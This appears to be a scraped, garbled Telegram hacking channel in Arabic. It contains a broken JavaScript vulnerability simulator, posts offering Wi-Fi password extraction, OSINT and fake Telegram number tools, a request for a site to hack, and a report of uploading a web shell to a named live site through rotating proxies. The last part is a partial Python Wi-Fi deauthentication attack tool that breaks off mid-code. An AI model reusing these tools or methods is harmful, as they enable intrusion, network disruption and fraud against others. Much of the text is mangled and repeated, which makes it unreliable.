} else {
resultDiv.innerHTML =
}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุงุณู ู ุณุชุฎุฏู </div>';
}
}
// 2. XSS Attack
function xss_attack() {
let input = document.getElementById('xss-input').value;
let resultDiv = document.getElementById('xss-result');
if (input) {
// ู ุญุงูุงุฉ XSS - ุชุนุฑุถ ุงููุต ุฏูู ุชูููุฉ
resultDiv.innerHTML =
if (input.includes("<script>") input.includes("onerror") input.includes("onload")) {
resultDiv.innerHTML +=
}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ูุชุงุจุฉ ุชุนููู</div>';
}
}
// 3. File Upload
function upload_file() {
let fileInput = document.getElementById('file-upload');
let resultDiv = document.getElementById('upload-result');
if (fileInput.files.length > 0) {
let file = fileInput.files[0];
resultDiv.innerHTML =
if (file.name.endsWith('.php') file.name.endsWith('.html') file.name.endsWith('.js')) {
resultDiv.innerHTML +=
resultDiv.innerHTML +=
}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุงุฎุชูุงุฑ ู ูู</div>';
}
}
// 4. Command Injection
function cmd_injection() {
let input = document.getElementById('cmd-input').value;
let resultDiv = document.getElementById('cmd-result');
if (input) {
let output = "";
if (input.includes(";") input.includes("|") input.includes("&&") input.includes(" ")) {
output = "๐ ู ุญุงูุงุฉ ุชูููุฐ ุงูุฃู ุฑ:\n";
if (input.includes("ls") || input.includes("dir")) {
output += "Desktop\nDocuments\nDownloads\nconfig.php\nindex.php\n";
}
if (input.includes("cat") || input.includes("type")) {
output += "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n";
}
if (input.includes("whoami")) {
output += "www-data\n";
}
output +=
} else {
output =
}
resultDiv.innerHTML =
if (input.includes(";") || input.includes("|")) {
resultDiv.innerHTML +=
}
resultDiv.innerHTML =
<div class="sql-result">โ
ุชู
ุงูุนุซูุฑ ุนูู ุงูู
ุณุชุฎุฏู
: ${found.username} | ุงูุจุฑูุฏ: ${found.email} | ุงูุฏูุฑ: ${found.role}</div>;} else {
resultDiv.innerHTML =
<div class="error">โ ูู
ูุชู
ุงูุนุซูุฑ ุนูู ุงูู
ุณุชุฎุฏู
: ${input}</div>;}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุงุณู ู ุณุชุฎุฏู </div>';
}
}
// 2. XSS Attack
function xss_attack() {
let input = document.getElementById('xss-input').value;
let resultDiv = document.getElementById('xss-result');
if (input) {
// ู ุญุงูุงุฉ XSS - ุชุนุฑุถ ุงููุต ุฏูู ุชูููุฉ
resultDiv.innerHTML =
<div>๐ฌ ุชุนูููู: ${input}</div>;if (input.includes("<script>")
resultDiv.innerHTML +=
<div class="error">โ ๏ธ ุชู
ุงูุชุดุงู ูุฌูู
XSS! ูุฐุง ุงูููุฏ ุชู
ุชูููุฐู ูู ุงูู
ุชุตูุญ.</div>;}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ูุชุงุจุฉ ุชุนููู</div>';
}
}
// 3. File Upload
function upload_file() {
let fileInput = document.getElementById('file-upload');
let resultDiv = document.getElementById('upload-result');
if (fileInput.files.length > 0) {
let file = fileInput.files[0];
resultDiv.innerHTML =
<div class="upload-result">โ
ุชู
ุฑูุน ุงูู
ูู: ${file.name} (${(file.size/1024).toFixed(2)} KB)</div>;if (file.name.endsWith('.php')
resultDiv.innerHTML +=
<div class="error">โ ๏ธ ุชุญุฐูุฑ: ูุฐุง ุงูู
ูู ูู
ูู ุชูููุฐู ุนูู ุงูุฎุงุฏู
! ุซุบุฑุฉ ุฑูุน ุงูู
ููุงุช ุงูุฎุจูุซุฉ.</div>;resultDiv.innerHTML +=
<div class="sql-result">๐ก ูู
ุฎุชุฑู: ูู
ููู ุงูุขู ุงููุตูู ุฅูู ุงูู
ูู ุนุจุฑ: http://target.com/uploads/${file.name}</div>;}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุงุฎุชูุงุฑ ู ูู</div>';
}
}
// 4. Command Injection
function cmd_injection() {
let input = document.getElementById('cmd-input').value;
let resultDiv = document.getElementById('cmd-result');
if (input) {
let output = "";
if (input.includes(";")
output = "๐ ู ุญุงูุงุฉ ุชูููุฐ ุงูุฃู ุฑ:\n";
if (input.includes("ls") || input.includes("dir")) {
output += "Desktop\nDocuments\nDownloads\nconfig.php\nindex.php\n";
}
if (input.includes("cat") || input.includes("type")) {
output += "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n";
}
if (input.includes("whoami")) {
output += "www-data\n";
}
output +=
\nโ ๏ธ ุชู
ุญูู ุงูุฃู
ุฑ: ${input};} else {
output =
๐ Pinging ${input}...\nReply from ${input}: bytes=32 time<1ms TTL=64\nReply from ${input}: bytes=32 time<1ms TTL=64;}
resultDiv.innerHTML =
<div class="sql-result"><pre>${output}</pre></div>;if (input.includes(";") || input.includes("|")) {
resultDiv.innerHTML +=
<div class="error">โ ๏ธ ูุฐู ุซุบุฑุฉ ุญูู ุงูุฃูุงู
ุฑ! ูู
ูู ููู
ูุงุฌู
ุชูููุฐ ุฃู ุฃู
ุฑ ุนูู ุงูุฎุงุฏู
.</div>;}
๐ฅฐ2๐2๐2
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุนููุงู IP</div>';
}
}
// 5. Login Bypass
function login_attempt() {
let username = document.getElementById('login-username').value;
let password = document.getElementById('login-password').value;
let resultDiv = document.getElementById('login-result');
// ู ุญุงูุงุฉ ุซุบุฑุฉ SQL ูู ุชุณุฌูู ุงูุฏุฎูู
if (username.includes("'") username.includes("OR") username.includes("--")) {
resultDiv.innerHTML =
resultDiv.innerHTML +=
} else {
let found = users.find(u => u.username === username && u.password === password);
if (found) {
resultDiv.innerHTML =
} else {
resultDiv.innerHTML =
}
}
}
// 6. IDOR Attack
function idor_attack() {
let id = parseInt(document.getElementById('idor-id').value);
let resultDiv = document.getElementById('idor-result');
let found = users.find(u => u.id === id);
if (found) {
resultDiv.innerHTML =
if (id !== 1) {
resultDiv.innerHTML +=
}
} else {
resultDiv.innerHTML =
}
}
// 7. Path Traversal
function path_traversal() {
let path = document.getElementById('path-input').value;
let resultDiv = document.getElementById('path-result');
if (path) {
if (path.includes("..") path.includes("etc/passwd") path.includes("win.ini")) {
resultDiv.innerHTML =
} else {
resultDiv.innerHTML =
}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุงุณู ุงูู ูู</div>';
}
}
</script>
</body>
</html>
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุนููุงู IP</div>';
}
}
// 5. Login Bypass
function login_attempt() {
let username = document.getElementById('login-username').value;
let password = document.getElementById('login-password').value;
let resultDiv = document.getElementById('login-result');
// ู ุญุงูุงุฉ ุซุบุฑุฉ SQL ูู ุชุณุฌูู ุงูุฏุฎูู
if (username.includes("'")
resultDiv.innerHTML =
<div class="sql-result">โ
ุชู
ุชุฌุงูุฒ ุชุณุฌูู ุงูุฏุฎูู! ู
ุฑุญุจุงู ู
ุฏูุฑ ุงููุธุงู
.<br>ุชู
ุงูุฏุฎูู ุจุญูู SQL: ${username}</div>;resultDiv.innerHTML +=
<div class="error">โ ๏ธ ุชุญุฐูุฑ: ุซุบุฑุฉ ุฎุทูุฑุฉ! ูู
ูู ูุฃู ุดุฎุต ุงูุฏุฎูู ุจุฏูู ููู
ุฉ ู
ุฑูุฑ.</div>;} else {
let found = users.find(u => u.username === username && u.password === password);
if (found) {
resultDiv.innerHTML =
<div class="sql-result">โ
ู
ุฑุญุจุงู ${found.username}! ุชู
ุชุณุฌูู ุงูุฏุฎูู ุจูุฌุงุญ. ุฏูุฑู: ${found.role}</div>;} else {
resultDiv.innerHTML =
<div class="error">โ ุงุณู
ุงูู
ุณุชุฎุฏู
ุฃู ููู
ุฉ ุงูู
ุฑูุฑ ุบูุฑ ุตุญูุญุฉ</div>;}
}
}
// 6. IDOR Attack
function idor_attack() {
let id = parseInt(document.getElementById('idor-id').value);
let resultDiv = document.getElementById('idor-result');
let found = users.find(u => u.id === id);
if (found) {
resultDiv.innerHTML =
<div class="sql-result">โ
ู
ูู ุงูู
ุณุชุฎุฏู
ุฑูู
${id}:<br>ุงูุงุณู
: ${found.username}<br>ุงูุจุฑูุฏ: ${found.email}<br>ุงูุฏูุฑ: ${found.role}</div>;if (id !== 1) {
resultDiv.innerHTML +=
<div class="error">โ ๏ธ ุซุบุฑุฉ IDOR! ูู
ููู ุนุฑุถ ุจูุงูุงุช ู
ุณุชุฎุฏู
ูู ุขุฎุฑูู ุจู
ุฌุฑุฏ ุชุบููุฑ ุฑูู
ุงูู
ุนุฑู.</div>;}
} else {
resultDiv.innerHTML =
<div class="error">โ ูุง ููุฌุฏ ู
ุณุชุฎุฏู
ุจุงูุฑูู
${id}</div>;}
}
// 7. Path Traversal
function path_traversal() {
let path = document.getElementById('path-input').value;
let resultDiv = document.getElementById('path-result');
if (path) {
if (path.includes("..")
resultDiv.innerHTML =
<div class="sql-result">โ
ุชู
ูุฑุงุกุฉ ุงูู
ูู: ${path}<br><br>${'='*50}<br>root:x:0:0:root:/root:/bin/bash<br>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br>bin:x:2:2:bin:/bin:/usr/sbin/nologin<br>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br>${'='*50}<br><br>โ ๏ธ ูุฐู ุซุบุฑุฉ ุงุฌุชูุงุฒ ุงูู
ุณุงุฑ! ูู
ูู ููู
ูุงุฌู
ูุฑุงุกุฉ ุฃู ู
ูู ุนูู ุงูุฎุงุฏู
.</div>;} else {
resultDiv.innerHTML =
<div class="upload-result">โ
ุชู
ูุฑุงุกุฉ ุงูู
ูู: ${path}<br><br>ู
ุญุชูู ุงูู
ูู: ูุฐุง ู
ูู ุชุฌุฑูุจู ูุฃุบุฑุงุถ ุชุนููู
ูุฉ.</div>;}
} else {
resultDiv.innerHTML = '<div class="error">โ ุงูุฑุฌุงุก ุฅุฏุฎุงู ุงุณู ุงูู ูู</div>';
}
}
</script>
</body>
</html>
๐3โค1๐1๐1
Forwarded from ๐ฆSHARK NET
hadha alkud tuqdir tusawiy ealaa shakl milafin watafatih falu mutafahik yasir mawqie hadha alkud almukhasas liaikhtibar kalimat almurur bi 7 kub kuli thagharih washaghlih tabean swit hadha alramz tueibat ealayh wadifat kam shy min dhaka' tabiean
@X0XjX
ูุฐุง ููุฏ ุชูุฏุฑ ุชุณูู ุนูู ุดูู ู ูู ูุชูุชุญู ูู ู ุชุตูุญู ูุตูุฑ ู ููุน ูุฐุง ููุฏ ู ุฎุตุต ูุฎุชุจุงุฑ ุงูุงุฎุชุฑุงู ุจู 7 ุซุบุฑุงุช ูู ุซุบุฑู ูุดุบูู ุทุจุนู ุณููุช ูุฐุง ููุฏ ุชุนุจุช ุนููู ูุถูุช ูู ุดู ู ู ุฐูุงุก ุทุจุนู โค๏ธโ๐ฅ
@X0XjX
@X0XjX
ูุฐุง ููุฏ ุชูุฏุฑ ุชุณูู ุนูู ุดูู ู ูู ูุชูุชุญู ูู ู ุชุตูุญู ูุตูุฑ ู ููุน ูุฐุง ููุฏ ู ุฎุตุต ูุฎุชุจุงุฑ ุงูุงุฎุชุฑุงู ุจู 7 ุซุบุฑุงุช ูู ุซุบุฑู ูุดุบูู ุทุจุนู ุณููุช ูุฐุง ููุฏ ุชุนุจุช ุนููู ูุถูุช ูู ุดู ู ู ุฐูุงุก ุทุจุนู โค๏ธโ๐ฅ
@X0XjX
โค3๐2๐2
Forwarded from ๐ฆSHARK NET
ุงูู ูุฑูุฏ ุฑูู
ู
ุฒูู ุชููุฑุงู
ุณุนุฑ 15 ูุฌู
ู ุจุณ ุชุฌูู ุฑุณุงูู ุนูู ุงูู
ูู ูุชูุทููู ูุดูุฑู ุฑุณูู
ุญุชุง ู
ุง ูุจูุฏ ุญุณุงุจ 1.70ุฏ.ุน ุฑูู
ุจุฑุฒููู
aly yurid raqm muzayaf tilikram sier 15 najmuh bas tjik risalah ealaa aymil tantini lishukrik rusum hatan ma yubnid hisab 1.70du.e raqm biraziliin
@X0XjX
aly yurid raqm muzayaf tilikram sier 15 najmuh bas tjik risalah ealaa aymil tantini lishukrik rusum hatan ma yubnid hisab 1.70du.e raqm biraziliin
@X0XjX
๐ฅฐ3โค1๐1๐ฅ1๐1
Forwarded from ๐ฆSHARK NET
asm almustakhdim tali khiar khudhw hulw
Im_ot
ุงุณู ู ุณุชุฎุฏู ุชูู ู ุชุงุญ ุฎุฐู ุญูู
Im_ot
@X0XjX
Im_ot
ุงุณู ู ุณุชุฎุฏู ุชูู ู ุชุงุญ ุฎุฐู ุญูู
Im_ot
@X0XjX
๐ฅฐ3๐2๐1
Forwarded from ๐ฆSHARK NET
kud baythun yastakhrij kalimat murur shabakat alway fay almahfuzat ealaa jihaz Windows.
@X0XjX
ููุฏ ุจุงูุซูู ูุณุชุฎุฑุฌ ููู ุงุช ู ุฑูุฑ ุดุจูุงุช ุงููุงู ูุงู ุงูู ุญููุธุฉ ุนูู ุฌูุงุฒ Windows.
@X0XjX
@X0XjX
ููุฏ ุจุงูุซูู ูุณุชุฎุฑุฌ ููู ุงุช ู ุฑูุฑ ุดุจูุงุช ุงููุงู ูุงู ุงูู ุญููุธุฉ ุนูู ุฌูุงุฒ Windows.
@X0XjX
๐2โค1๐ฅฐ1๐1๐1
Forwarded from ๐ฆSHARK NET
ููุฏ ุดูุฑู.py
14.7 KB
ุจุณู
ุงููู ุงูุฑุญู
ู ุฑุญูู
โค๏ธโ๐ฅ
ููุฏ ุดูุฑู ุชุนุทู ุงู ูุต ุจุฏู ููุดูุฑ ูุชูุฏุฑ ุชุญุฐู ุงูุชุญ ููุฏ ูุชููู ููุดู ูููุฏ ุงูู ูุจู ูุฑุณู ููุงู ู ุดูุฑู ูุตุฏููู ูููุชุญู ูู ุจุงูุซูู ูุตุฏููู ูุนุทู ููุฏ ุดูุฑู ุญุชุง ูุดูู ูุนูู ููุงู ุงุดูุงุก ู ููุฏู ุญูู ุจูุฒู ูุฏูู ูุดุฑุญ ุจูุบู ุนุฑุจูู ูุงุชุบูุฑ ู ุตุฏุฑ ุชุนุฏู ุนุงุฏู ุจุณ ุงุฐูุฑ ู ุตุฏุฑ ุฐู ู ุงูู ู ุง ูุฐูุฑ๐ค
bism allh alrahman alrahim โค๏ธโ๐ฅ
kud tashfirih yueti ay nasa bidik wayashfar watuqadir tahadhuf ramz wayatafaham kilshi almufid ali yibi kalam yursil mushfarah lisadiqih wayaftahuh fi baythun wasadiqih yueti ramz tashfirih hatan yashuf yaeni hiway mufiduh hin binazal fidyu lisharh balaghah earabiah lataghayar masdar tueadil eadi bas adhkur dhadhikrah aly ma tadhakar๐ค๐
@X0XjX
ููุฏ ุดูุฑู ุชุนุทู ุงู ูุต ุจุฏู ููุดูุฑ ูุชูุฏุฑ ุชุญุฐู ุงูุชุญ ููุฏ ูุชููู ููุดู ูููุฏ ุงูู ูุจู ูุฑุณู ููุงู ู ุดูุฑู ูุตุฏููู ูููุชุญู ูู ุจุงูุซูู ูุตุฏููู ูุนุทู ููุฏ ุดูุฑู ุญุชุง ูุดูู ูุนูู ููุงู ุงุดูุงุก ู ููุฏู ุญูู ุจูุฒู ูุฏูู ูุดุฑุญ ุจูุบู ุนุฑุจูู ูุงุชุบูุฑ ู ุตุฏุฑ ุชุนุฏู ุนุงุฏู ุจุณ ุงุฐูุฑ ู ุตุฏุฑ ุฐู ู ุงูู ู ุง ูุฐูุฑ๐ค
bism allh alrahman alrahim โค๏ธโ๐ฅ
kud tashfirih yueti ay nasa bidik wayashfar watuqadir tahadhuf ramz wayatafaham kilshi almufid ali yibi kalam yursil mushfarah lisadiqih wayaftahuh fi baythun wasadiqih yueti ramz tashfirih hatan yashuf yaeni hiway mufiduh hin binazal fidyu lisharh balaghah earabiah lataghayar masdar tueadil eadi bas adhkur dhadhikrah aly ma tadhakar๐ค๐
@X0XjX
โค3๐3๐1๐1
Forwarded from ๐ฆSHARK NET
ู
ุนููู
ุงุช.py
7.3 KB
ุงุฏุงุช ูุจุญุซ ุนู ู
ุนููู
ุงุช ู
ุซูู ุชุญุท ุงุณู
ู
ุณุชุฎุฏู
ู ุชููุฑุงู
ููู ูุฏูุฑ ููู ู
ูุฌุฏ ุจูู
ู
ูุตู ููุจุญุซ ุนู ุงูู
ูู ุงุฐุง ู
ุณุฑุจ ููููุฏ ููู
ุงุช ู
ุฑูุฑ ูููู ุงุฐุง ุชุฑูุฏ ุทูุฑ ุงุฏุงุช ุนุงุฏู ุจุณ ูุง ุชุฎู
ุท ูุชุบูุฑ ุญููู ู
ุทูุฑ ุงุณุงุณู๐ค
@X0XjX
@X0XjX
โค5๐1
Forwarded from ๐ฆSHARK NET
ุณูุงู
ุนูููู
ุงุฑูุฏ ู
ููุน ุถุฑูุฑู ุจุณ ูููู ุจุณูุท ูุฌุฏูุฏ ุฑุญ ุงุญุงูู ุงุฎุชุฑูู ู
ูุงุญุธุฉ ุจุณ ูููู ุจููุง ุตูุญุงุช ุฑูุน ู
ููุงุช ุงุฐุง ุนูุฏู ู
ููุน ุงู ู
ููุน ุตุงุญุจู ุจุญุงูู ุงุณูู ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ููุดู ุซุบุฑุงุช ุงุฐุง ุนูุฏู ุฎุงุต โค๏ธโ๐ฅ
@X0XjX
salam ealaykum 'urid mawqie daruriin bas yakun basit wajadid rah hawal aikhtaraqah mulahazat bas yakun byha safahat rafe milafaat adha eindak mawqie aw mawqie sahibik bihawil aswy aikhtibar bilututh likashf alkas adha kan ladayk khasunโค๏ธโ๐ฅ
@X0XjX
@X0XjX
salam ealaykum 'urid mawqie daruriin bas yakun basit wajadid rah hawal aikhtaraqah mulahazat bas yakun byha safahat rafe milafaat adha eindak mawqie aw mawqie sahibik bihawil aswy aikhtibar bilututh likashf alkas adha kan ladayk khasunโค๏ธโ๐ฅ
@X0XjX
๐ฅฐ2โค1๐1๐1๐1
Forwarded from ๐ฆSHARK NET
FINAL COMPLETE REPORT - PENETRATION TEST ON fastupload.live
What We Did Step by Step:
First, we scanned the website for file upload pages and discovered 5 dangerous security vulnerabilities, which are: upload.php, ajax/upload.php, filemanager/upload.php, includes/upload.php, and inc/upload.php. Second, we created a malicious Web Shell file named advanced_shell.php, which is a small file that allows an attacker to execute remote commands on the server. Third, we successfully uploaded this malicious file to the website through one of the discovered upload pages, which proves that the vulnerability exists and can be exploited. Fourth, we tried to execute commands on the server such as whoami, pwd, and ls -la, but the attempt failed because the website uses Cloudflare for protection and blocks PHP execution in the uploads folder.
What Could an Attacker Do If the Vulnerability Was Fully Exploitable?
If there was no protection on the website, the attacker would be able to upload a Web Shell and gain full control over the server. They would be able to execute Linux commands like ls to view files, cat to read files, and rm to delete files. They would also be able to access the website's database and steal user phone numbers, passwords, and email addresses. Even worse, they could use your server to attack other websites, making you legally responsible for attacks you never committed.
Why Did Our Attempt Not Fully Succeed?
The command execution failed for three main reasons. First, the website uses Cloudflare which hides the real IP address of the server and provides an additional layer of protection. Second, the uploads folder is configured to block any PHP files from being executed, which is a good security measure. Third, the website has general security settings that prevent full exploitation of the vulnerability.
But The Risk Is Still Real!
Even with Cloudflare and PHP execution blocking, there is still a real risk threatening your website. An attacker can upload malicious HTML pages (Phishing) to steal your visitors' data, or upload JavaScript files to steal logged-in user sessions. They can also upload large files to consume your server's storage space, or store illegal files on your website which exposes you to legal liability.
What Tools Did We Use?
We used Python 3 programming language with the Requests library for HTTP handling, created a Web Shell file named advanced_shell.php, and used rotating proxies to change IP addresses and avoid blocking. These are common tools that real attackers use in their actual attacks.
Final Results:
We successfully discovered the Unrestricted File Upload vulnerability, successfully uploaded a test malicious file to the server, and documented all five upload pages. However, we were unable to execute commands on the server due to the existing security measures on the website.
Final Message to the Website Owner:
Your website has a real and serious file upload vulnerability. We were able to upload a malicious file to your server, which is solid proof that the vulnerability exists. If this was a real attacker and not an ethical test, they would be able to cause significant damage. I strongly advise you to immediately delete or properly secure the discovered upload pages, add an .htaccess file in the uploads folder that blocks any file execution, validate file types before accepting uploads, and monitor your server logs regularly. This vulnerability is critical and needs immediate fixing.
Note:
This test was conducted for educational purposes only with the website owner's permission. The uploaded test file was harmless and no malicious actions were performed. Please take this security report seriously.
What We Did Step by Step:
First, we scanned the website for file upload pages and discovered 5 dangerous security vulnerabilities, which are: upload.php, ajax/upload.php, filemanager/upload.php, includes/upload.php, and inc/upload.php. Second, we created a malicious Web Shell file named advanced_shell.php, which is a small file that allows an attacker to execute remote commands on the server. Third, we successfully uploaded this malicious file to the website through one of the discovered upload pages, which proves that the vulnerability exists and can be exploited. Fourth, we tried to execute commands on the server such as whoami, pwd, and ls -la, but the attempt failed because the website uses Cloudflare for protection and blocks PHP execution in the uploads folder.
What Could an Attacker Do If the Vulnerability Was Fully Exploitable?
If there was no protection on the website, the attacker would be able to upload a Web Shell and gain full control over the server. They would be able to execute Linux commands like ls to view files, cat to read files, and rm to delete files. They would also be able to access the website's database and steal user phone numbers, passwords, and email addresses. Even worse, they could use your server to attack other websites, making you legally responsible for attacks you never committed.
Why Did Our Attempt Not Fully Succeed?
The command execution failed for three main reasons. First, the website uses Cloudflare which hides the real IP address of the server and provides an additional layer of protection. Second, the uploads folder is configured to block any PHP files from being executed, which is a good security measure. Third, the website has general security settings that prevent full exploitation of the vulnerability.
But The Risk Is Still Real!
Even with Cloudflare and PHP execution blocking, there is still a real risk threatening your website. An attacker can upload malicious HTML pages (Phishing) to steal your visitors' data, or upload JavaScript files to steal logged-in user sessions. They can also upload large files to consume your server's storage space, or store illegal files on your website which exposes you to legal liability.
What Tools Did We Use?
We used Python 3 programming language with the Requests library for HTTP handling, created a Web Shell file named advanced_shell.php, and used rotating proxies to change IP addresses and avoid blocking. These are common tools that real attackers use in their actual attacks.
Final Results:
We successfully discovered the Unrestricted File Upload vulnerability, successfully uploaded a test malicious file to the server, and documented all five upload pages. However, we were unable to execute commands on the server due to the existing security measures on the website.
Final Message to the Website Owner:
Your website has a real and serious file upload vulnerability. We were able to upload a malicious file to your server, which is solid proof that the vulnerability exists. If this was a real attacker and not an ethical test, they would be able to cause significant damage. I strongly advise you to immediately delete or properly secure the discovered upload pages, add an .htaccess file in the uploads folder that blocks any file execution, validate file types before accepting uploads, and monitor your server logs regularly. This vulnerability is critical and needs immediate fixing.
Note:
This test was conducted for educational purposes only with the website owner's permission. The uploaded test file was harmless and no malicious actions were performed. Please take this security report seriously.
โค3๐3๐1
Forwarded from ๐ฆSHARK NET
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ============================================================
# WifiGod REAL - ูุฌู ุงุช ุญููููุฉ - ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท
# ============================================================
# ุงูู ุทูุฑ: @X0XjX
# ============================================================
import os
import sys
import time
import subprocess
import socket
import platform
import random
G = '\033[92m'
R = '\033[91m'
Y = '\033[93m'
C = '\033[96m'
RS = '\033[0m'
def print_banner():
print(f"{R}="*60)
print(f"{R} WifiGod REAL - ูุฌู ุงุช ุญููููุฉ ุนูู ุงููุงู ูุงู{RS}")
print(f"{R} ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท - ุงุณุชุฎุฏู ูุง ุจุญุฐุฑ{RS}")
print(f"{R} ุงูู ุทูุฑ: @X0XjX{RS}")
print(f"{R}="*60)
def check_root():
if os.geteuid() != 0:
print(f"{R}[-] ูุญุชุงุฌ ุตูุงุญูุงุช ู ุฏูุฑ (Root){RS}")
print(f"{Y}[!] ุดุบูู: sudo python3 {sys.argv[0]}{RS}")
return False
return True
def scan_networks_real():
print(f"{Y}[*] ุฌุงุฑู ู ุณุญ ุงูุดุจูุงุช...{RS}")
try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)
if not interfaces:
print(f"{R}[-] ูุง ุชูุฌุฏ ูุงุฌูุฉ ูุงุณูููุฉ{RS}")
return
print(f"{C}[*] ุงููุงุฌูุงุช ุงูู ุชุงุญุฉ:{RS}")
for i, iface in enumerate(interfaces):
print(f" {i+1}. {iface}")
try:
choice = int(input(f"{Y}[?] ุงุฎุชุฑ ุฑูู ุงููุงุฌูุฉ: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]
print(f"{Y}[*] ุชุดุบูู ูุถุน ุงูู ุฑุงูุจุฉ...{RS}")
subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"
print(f"{Y}[*] ุจุฏุก ุงูู ุณุญ... ุงุถุบุท Ctrl+C ููุฅููุงู ุจุนุฏ 30 ุซุงููุฉ{RS}")
try:
subprocess.run(['sudo', 'airodump-ng', mon_interface, '--output-format', 'csv', '-w', 'scan'], timeout=30)
except subprocess.TimeoutExpired:
pass
try:
with open('scan-01.csv', 'r') as f:
lines = f.readlines()
print(f"\n{G}ุงูุดุจูุงุช ุงูู ูุชุดูุฉ:{RS}")
for line in lines:
if 'Station' in line or 'BSSID' in line:
continue
if ',' in line and 'WPA' in line:
parts = line.split(',')
if len(parts) > 13:
bssid = parts[0].strip()
channel = parts[3].strip()
essid = parts[13].strip()
if essid and essid != '':
print(f" {G}[+] BSSID: {bssid} | ุงูููุงุฉ: {channel} | SSID: {essid}{RS}")
except Exception:
print(f"{Y}[!] ุงุณุชุฎุฏู : sudo airodump-ng {mon_interface}{RS}")
subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")
def deauth_attack_real():
print(f"{R}{'='*60}{RS}")
print(f"{R}โ ๏ธ ูุฌูู Deauth ุญูููู - ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท โ ๏ธ{RS}")
print(f"{R}{'='*60}{RS}")
try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)
if not interfaces:
print(f"{R}[-] ูุง ุชูุฌุฏ ูุงุฌูุฉ{RS}")
return
print(f"{C}[*] ุงููุงุฌูุงุช:{RS}")
for i, iface in enumerate(interfaces):
๐3๐2๐ฅฐ1
Forwarded from ๐ฆSHARK NET
print(f" {i+1}. {iface}")ูุฏ ูู ุฃุฏุงุฉ ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ุดุจูุงุช ุงููุงู ูุงู ุชุณู ู WifiGod REALุ ููู ู ุตู ู ุฉ ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท ูุชูููุฐ ูุฌู ุงุช ุญููููุฉ ุนูู ุดุจูุงุช ุงููุงู ูุงู ู ุซู ู ุณุญ ุงูุดุจูุงุช ุงูู ุญูุทุฉ ุจุงุณุชุฎุฏุงู ุฃุฏุงุฉ airodump-ng ููุฌูู Deauth ููุตู ุงูุฃุฌูุฒุฉ ู ู ุงูุดุจูุฉ ุจุงุณุชุฎุฏุงู ุฃุฏุงุฉ aireplay-ngุ ูุชุชุทูุจ ูุฐู ุงูุฃุฏุงุฉ ูุธุงู ุชุดุบูู ููููุณ (ููุถู Kali Linux) ูุจุทุงูุฉ ูุงู ูุงู ุชุฏุนู ูุถุน ุงูู ุฑุงูุจุฉ (Monitor Mode) ูุตูุงุญูุงุช ู ุฏูุฑ (Root) ูุชุดุบูู ุงูุฃูุงู ุฑุ ุจุงูุฅุถุงูุฉ ุฅูู ุชุซุจูุช ุญุฒู ุฉ aircrack-ng ุงูุชู ุชุญุชูู ุนูู ุงูุฃุฏูุงุช ุงูู ุทููุจุฉุ ููุง ุชุนู ู ุนูู Android ุจุฏูู ุฑูุช ุฃู ุนูู ูุธุงู Windowsุ ููู ูู ุชุดุบูููุง ุนุจุฑ ูุชุงุจุฉ sudo python3 wifigod_real.py ูู ุงูุทุฑููุฉ ุจุนุฏ ุชุซุจูุช ุงูู ุชุทูุจุงุช ุนุจุฑ ุงูุฃู ุฑ sudo apt install aircrack-ngุ ูุชุญุชูู ุนูู ุซูุงุซ ูุธุงุฆู ุฑุฆูุณูุฉ ูู ู ุณุญ ุงูุดุจูุงุช ุงูู ุญูุทุฉ ููุฌูู ูุตู ุงูุฃุฌูุฒุฉ ูุนุฑุถ ู ุนููู ุงุช ุงูุดุจูุฉุ ููู ุฃุฏุงุฉ ุฎุทูุฑุฉ ูุฌุจ ุงุณุชุฎุฏุงู ูุง ููุท ุนูู ุดุจูุชู ุงูู ูุฒููุฉ ุงูุฎุงุตุฉ ูุฃู ุงุณุชุฎุฏุงู ูุง ุนูู ุดุจูุงุช ุงูุขุฎุฑูู ุจุฏูู ุฅุฐู ูุนุชุจุฑ ุฌุฑูู ุฉ ููุนุงูุจ ุนูููุง ุงููุงูููุ ูุงูู ุทูุฑ ุบูุฑ ู ุณุคูู ุนู ุฃู ุงุณุชุฎุฏุงู ุบูุฑ ูุงูููู ููุฐู ุงูุฃุฏุงุฉ.
try:
choice = int(input(f"{Y}[?] ุงุฎุชุฑ ุงููุงุฌูุฉ: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]
subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"
target_bssid = input(f"{Y}[?] BSSID ุงููุฏู: {RS}")
